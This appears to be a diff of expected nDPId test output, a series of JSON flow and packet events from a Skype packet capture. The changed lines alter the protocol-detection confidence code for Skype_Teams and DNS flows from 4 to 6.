-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1148,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1148,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1149,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.159","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1149,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1431970677974,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431970677974,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyXBgAAEARPQLAqAEinTeCnzLdnFAAHlQNe6UCbRCk9Zm0qay7l4LGg8ZPRvGp2A=="} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1149,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.159","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1149,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.159","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1150,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.170","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1150,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1431970677974,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970677974,"pkt":"0NQSxnP1PBXCt3IOCABFAABATykAAEARrDLAqAEib91NqjLdnFUALAKIe6cC06nLoifBCja4NtBTBPAIMkjY1r+eVyo0K906xL\/RnajP"} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1150,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.170","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1150,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.170","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 01133{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1161,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1431970678945,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431970678945,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAISqNoAAEARDjfAqAEi\/\/\/\/\/0RcRFwB\/vqceyJob3N0X2ludCI6IDE1NzMxOTU0NDUsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 01129{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1162,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1431970678946,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431970678946,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAISZSMAAEARj0bAqAEiwKgB\/0RcRFwB\/jf1eyJob3N0X2ludCI6IDE1NzMxOTU0NDUsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1164,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1164,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1431970678985,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970678985,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/p1UAAEAR8T7AqAEiQTffGDLdnF0AK+jLe6kC6fGNK2goAXsNse6RdApll6kRm4bOwgAP2hC\/D2eOAyk="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1164,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1164,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1165,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1165,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1431970678985,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970678985,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7GMMAAEARF0\/AqAEinTfrnjLdnFsAJ5Hde6sCJ8R84KyvegILw5PDMDyyzP0qbIKzwXJl3e6CLA=="} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1165,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1165,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1166,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1166,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1431970678985,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970678985,"pkt":"0NQSxnP1PBXCt3IOCABFAAA49SsAAEARo3fAqAEiQTffEDLdnGAAJBSJe60CT4+h0ZiCfQwqP7NMcZ5acjfF0jfx+oM28A=="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1166,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1166,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 01133{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1167,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1431970679027,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431970679027,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISpvoAAEARD93AqAFc\/\/\/\/\/0RcRFwB\/v9VeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 01129{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1168,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1431970679028,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431970679028,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISy7gAAEARKHfAqAFcwKgB\/0RcRFwB\/jyueyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1179,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679839,"flow_last_seen":1431970679839,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970679839,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60413,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1179,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1431970679839,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431970679839,"pkt":"0NQSxnP1PBXCt3IOCABFAABK0kgAAEARJOfAqAEiwKgBAev9ADUANqf\/XW0BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDABcgVza3lwZQNuZXQAAAEAAQ=="} -00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1179,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679839,"flow_last_seen":1431970679839,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970679839,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60413,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst0.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1179,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679839,"flow_last_seen":1431970679839,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970679839,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60413,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst0.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1180,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679839,"flow_last_seen":1431970679839,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970679839,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64364,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1180,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1431970679839,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431970679839,"pkt":"0NQSxnP1PBXCt3IOCABFAABKzS8AAEARKgDAqAEiwKgBAftsADUANoJ0c24BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDABcgVza3lwZQNuZXQAABwAAQ=="} -00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1180,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679839,"flow_last_seen":1431970679839,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970679839,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64364,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst0.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1180,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679839,"flow_last_seen":1431970679839,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970679839,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64364,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst0.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1182,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970679995,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1182,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1431970679995,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970679995,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7shQAAEARfXbAqAEi1cezlTLdnF4AJ7D1e68CWBP9byLKqG9T\/ZSkhpqmfvjcm+3DFpOZwv2yxQ=="} 